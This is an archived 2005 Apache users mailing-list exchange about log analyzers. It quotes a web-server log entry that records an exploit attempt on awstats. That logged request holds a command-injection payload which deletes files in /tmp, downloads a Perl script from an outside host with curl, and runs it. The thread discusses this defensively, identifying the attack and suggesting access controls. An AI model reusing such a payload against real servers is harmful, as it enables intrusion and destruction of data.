Re: [users@httpd] Can Anyone Recommend A Log Analyzer?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: users@xxxxxxxxxxxxxxxx, "David P. Donahue" <ddonahue@xxxxxxxxxxx>
Subject: Re: [users@httpd] Can Anyone Recommend A Log Analyzer?
From: "David Tonhofer, m-plify S.A." <d.tonhofer@xxxxxxxxxxx>
Date: Sun, 13 Nov 2005 16:14:07 +0100
Delivered-to: apmail-httpd-users-archive@xxxxxxxxxxxxxx
Delivered-to: apmail-httpd-users-archive@xxxxxxxxxxxxxxxx
Delivered-to: mailing list users@xxxxxxxxxxxxxxxx
In-reply-to: <43767217.1090807@xxxxxxxxxxx>
Mailing-list: contact users-help@xxxxxxxxxxxxxxxx; run by ezmlm
References: <4376175D.8030703@xxxxxxxxxxx> <200511121433180509.116AB2A2@xxxxxxxxxxxxx> <43767217.1090807@xxxxxxxxxxx>
Reply-to: users@xxxxxxxxxxxxxxxx

AFAIK, it's an exploit attempt on an old version of awstats:

<http://www.securityfocus.com/bid/12543>

But if you secure the access with passwords and per-IP rules,
you will be safe... "default deny" is always a good idea.

Personally, I use the analog (www.analog.cx) log analyzer (never
tried awstats, so I may be considered a bit on the retro side...
any comments from the group?). And marketing is using the (nonfree)
"clicktracks" (www.clicktracks.com/)

Best regards,

-- David



--On Saturday, November 12, 2005 5:52 PM -0500 "David P. Donahue" <ddonahue@xxxxxxxxxxx> wrote:

http://awstats.sourceforge.net/


Looks good.  One thing that concerns me, though.  The name sounded familiar because of some attempts made on my web server from time to time.  I notice entries like the following in my logs (sorry for any wrapping):

host-216-153-162-21.pro.choiceone.net - - [13/Sep/2005:10:52:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/h4x000r/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 12682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

On one such occasion I even went and downloaded the PERL script to which it links and looked through the code.  Pretty unsettling.  As with any service, security is always a concern.  But it concerned me that attacks were being directed at this awstats package.

Is there anything I should know before just loading it up and running it?


Regards,
David P. Donahue
ddonahue@xxxxxxxxxxx

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx





---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx

References:
- [users@httpd] Can Anyone Recommend A Log Analyzer?
  - From: David P. Donahue
- Re: [users@httpd] Can Anyone Recommend A Log Analyzer?
  - From: Chris
- Re: [users@httpd] Can Anyone Recommend A Log Analyzer?
  - From: David P. Donahue

Prev by Date: [users@httpd] Getting started - problem with virtual sites (not necessarily 'hosts')
Next by Date: [users@httpd] PHP user mailing list?
Previous by thread: Re: [users@httpd] Can Anyone Recommend A Log Analyzer?
Next by thread: Re: [users@httpd] Can Anyone Recommend A Log Analyzer?
Index(es):
- Date
- Thread

[Index of Archives] [Open SSH Users] [Linux ACPI] [Linux Kernel] [Linux Laptop] [Kernel Newbies] [Security] [Netfilter] [Bugtraq] [Squid] [Yosemite News] [MIPS Linux] [ARM Linux] [Linux Security] [Linux RAID] [Samba] [Video 4 Linux] [Device Mapper]